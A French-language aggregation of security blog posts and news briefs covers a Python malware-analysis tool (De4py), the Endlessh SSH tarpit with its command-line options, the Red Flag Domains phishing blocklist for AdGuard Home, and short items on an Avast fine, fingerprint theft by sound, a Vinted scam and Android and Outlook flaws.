De4py aborde également le défi que représentent ces programmes Python qui tentent de s’auto-terminer lorsqu’ils détectent un débogueur ou une machine virtuelle. En supprimant la fonction de sortie, il vous permettra de ne plus galérer avec des sorties de programme surprises. De4py dispose aussi d’une fonctionnalité qui permet de récupérer et d’accéder à toutes les fonctions se trouvant dans le processus, ce qui est pratique si on veut modifier certaines fonctions en mémoire de manière plus précise.
Il y a également un analyseur de fichiers pour détecter si un programme Python est « packé ». Il tente alors d’extraire les programmes qui s’y trouvent en utilisant pyinstaller. Enfin, De4Py est capable de surveiller le comportement du programme sur votre système à savoir tout ce qui est manipulations de fichiers, activités de processus, interactions avec la mémoire, et même les communications via socket, avec détail de la taille des données transmises / reçues et des adresses IP. Cette fonctionnalité permet également l’extraction du contenu des sockets et le déchiffrement du contenu chiffré OpenSSL directement dans un fichier.
Bref, que ce soit via son interface graphique ou en mode terminal, De4Py est un super outil pour tous les amateurs de reverse engineering qui font notamment de l’analyse de malware.
Vous en saurez plus ici sur leur Github et le site officiel est ici.
Il est maintenant confirmé qu'Avast vendait illégalement des données de ses clients, obtenues via des logiciels qui indiquaient mensongèrement éliminer le traçage sur internet. L'éditeur d'antivirus a été condamné à 16,5 millions de dollars d'amende.
L’article Avast écope de 16 millions de dollars d’amende pour avoir vendu les données de ses clients est apparu en premier sur Toms Guide.
Une nouvelle technologie est capable de reproduire les empreintes digitales à partir du son, à l'aide des bruits produits par les doigts au contact d'un écran de smartphone. Intitulé PrintListener, ce logiciel permettrait aux pirates d'accéder à n'importe quel compte s'il tombait entre leurs mains.
L’article Les pirates peuvent reproduire vos empreintes digitales pour accéder à vos comptes est apparu en premier sur Toms Guide.
Les vendeurs de Vinted sont victimes d'une nouvelle arnaque sur la plateforme de revente de vêtements d'occasion. De nombreux arnaqueurs ouvrent des litiges, affirmant devant Vinted avoir reçu de la contrefaçon. Grâce aux conditions de remboursement avantageuses, le stratagème marche facilement.
L’article Vinted : la nouvelle arnaque à la contrefaçon frappe durement les vendeurs, méfiez-vous ! est apparu en premier sur Toms Guide.
Savez-vous ce qu’est un Tarpit ?
Alors, non, c’est pas l’ex d’Angelina. C’est plutôt l’équivalent numérique du nid de poule rempli de goudron dans lequel allaient mourir les dinosaures et les mammouth. Un tarpit est donc un système informatique qui va ralentir, voire embourber, n’ayons pas peur des mots ^^ les scripts kiddies qui seraient tentés de faire du bruteforce sur votre serveur.
Vous l’aurez compris, c’est donc un système de sécurité qui fait perdre du temps à l’assaillant en lui faisant croire qu’il est bon endroit, mais où chacun de ses essais de mots de passe devient de plus en plus lent.
Alors comment est ce qu’on met ça en place ?
Et bien sur votre serveur Linux, vous pouvez opter pour l’outil Endlessh. C’est open source, et c’est vachement efficace contre les bruteforce à destination de SSH. Une fois configuré, quand l’attaquant arrive sur l’écran de connexion SSH, tout ce qu’il fera ou verra à l’écran sera en réalité un faux écran de login SSH propulsé par Endlessh qui s’affichera tellement lentement que la seule option sera d’abandonner l’attaque.
Tout est réglable, à savoir le port utilisé, le délai d’affichage des messages, le nombre max de clients…etc.
Usage: endlessh [-vhs] [-d MS] [-f CONFIG] [-l LEN] [-m LIMIT] [-p PORT]
-4 Bind to IPv4 only
-6 Bind to IPv6 only
-d INT Message millisecond delay [10000]
-f Set and load config file [/etc/endlessh/config]
-h Print this help message and exit
-l INT Maximum banner line length (3-255) [32]
-m INT Maximum number of clients [4096]
-p INT Listening port [2222]
-s Print diagnostics to syslog instead of standard output
-v Print diagnostics (repeatable)De base, les gens qui utilisent ce tarpit le branchent sur le port 22 (qui est normalement celui de SSH) pour utiliser un autre port pour leur vrai accès distant. Mais grâce à cet autre projet nommé Fail2ban Endlessh, il est parfaitement possible de conserver une connexion classique SSH sur le port 22, mais de rediriger les IPs qui vous maltraitent vers Endlessh.
Voilà super outil qui ne consomme rien en termes de ressources, mais qui vous permettra de vous défendre contre les tentatives de connexions SSH non autorisées tout en réduisant la charge du serveur (puisque ça dissuade les cyber-Titouan de le bruteforcer).
Merci à MaitreTofu pour le partage.
Une faille de sécurité Wi-Fi critique rend vulnérables 2,3 milliards d'utilisateurs d'appareils Android aux attaques de pirates. Malheureusement, vous ne pouvez pas faire grand-chose pour vous protéger face à la menace des pirates informatiques, qui visent aussi bien les entreprises que les particuliers.
L’article Android : une faille Wi-Fi critique expose 2,3 milliards d’utilisateurs aux pirates est apparu en premier sur Toms Guide.
Cette clé USB open-source conçue par la société Interrupt Labs est dénuée de protection cryptographique. En revanche elle est équipée de plusieurs moyens de sécurité cachés, notamment la capacité de chauffer à 100°C pour déclencher une explosion.
L’article Cette clé USB ne laisse aucune chance aux pirates : elle explose ! est apparu en premier sur Toms Guide.
Outlook, le client de messagerie de Microsoft, présente une vulnérabilité critique qui peut être exploitée par un e-mail contenant un lien malveillant. Cette faille permet à un attaquant d'accéder aux fichiers de l'ordinateur de la victime. Voici comment vous protéger de cette menace.
L’article Faille critique dans Outlook : un simple mail permet le contrôle à distance de votre ordinateur est apparu en premier sur Toms Guide.
Cela vous intéresse de protéger automatiquement l'ensemble des périphériques de votre habitation contre les 20 000 sites Web d'escroquerie en ligne ?
Le site Red Flag Domains publie quasi quotidiennement la mise à jour d'une liste noire de domaines à fuir.
Chaque jour, ce n'est pas moins de 5 à 50 domaines qui sont détectés et blacklistés par Nicolas Pawlac grâce aux listes d'enregistrements de noms de domaine publiées par l'Afnic et l'ICANN.
Cette liste de domaines malveillants peut être facilement importée dans des outils de filtrage DNS comme AdGuard Home ou bien PiHole.
AdGuard Home est un logiciel gratuit que je vous avais présenté dans un précédent article et qui assure un contrôle parental en plus de permettre de filtrage DNS au sein de votre réseau local.
AdGuard Home se positionne entre les serveurs DNS sur Internet et vos périphériques.
Une fois installé, Adguard Home intercepte les requêtes de résolutions de noms (DNS) et vérifie préalablement que le nom de domaine recherché ne fait pas partie d'une liste noire avant de retourner une réponse au périphérique qui en fait la demande.
Il joue un rôle d'intermédiaire entre les serveurs DNS sur Internet et votre réseau domestique. Il s'assure que vos périphériques ne cherchent pas à rentrer en contact avec des noms de domaines malveillants.
AdGuard Home est disponible sous forme d'image Docker et s'installe assez facilement sur un NAS Synology si vous avez un peu de compétences en informatique. Si vous avez une baie de brassage dans votre logement, Adguard Home peut être une bonne solution de filtrage parental pour l'ensemble de votre réseau.
Adguard fonctionne aussi sous forme de plugins pour navigateur et logiciel de protection pour Windows et Mac OS.
Pour qu'il soit effectif, l'ensemble de vos périphériques doivent l'utiliser comme serveur DNS au sein de votre réseau domestique.
Le plus simple est de le configurer directement au niveau du serveur DHCP de votre domicile, l'adresse IP de l'AdGuard Home sera ainsi utilisée par tous les périphériques configurés avec une adresse IP dynamique.
Pour ajouter la liste de DNS de Red Flag Domains dans Adguard Home, cliquez sur :
Filtres -> Listes de blocage DNS -> Ajouter une liste de blocages -> Ajouter une liste personnalisée"
L'URL de la liste à saisir est celle-ci : https://dl.red.flag.domains/adguard/red.flag.domains.txt
Une fois importée, Adguard Home se chargera de synchroniser cette liste chaque jour pour maintenir sa liste noire toujours à jour. Attention, cette liste ne concerne que des domaines français et ne couvre pas les domaines d'autres pays.
Cette petite astuce vous permettra de protéger facilement votre réseau domestique des attaques de phishing et scamming.
Après avoir contacté l'auteur du projet, Nicolas Pawlac, pour lui poser quelques questions, le processus de détection des domaines frauduleux est quasi-automatique. La validation des domaines blacklistés est réalisée manuellement par Nicolas sur la base des nouveaux domaines enregistrés chaque jour.
Il arrive parfois qu'il rencontre des faux positifs, comme par exemple le site mamieestchaude.fr qui n'héberge pas du tout ce que vous imaginez ...
Certains fraudeurs ne se démontent pas et enregistrent des noms de domaine en se présentant comme étant Mel Gibson, Elon Musk, Gustave Flaubert ou en affirmant résider dans la ville alsacienne fictive de Troudbalsheim.
Vous pouvez soutenir le projet et offrir un café via la plateforme Ko-Fi.
Le projet Red Flag Domains est une belle initiative qui permet de rendre le Web plus sécurisé. Bravo Nicolas !
N'hésitez pas à passer sur le serveur Discord Geeek si vous avez des questions ou si vous souhaitez venir discuter.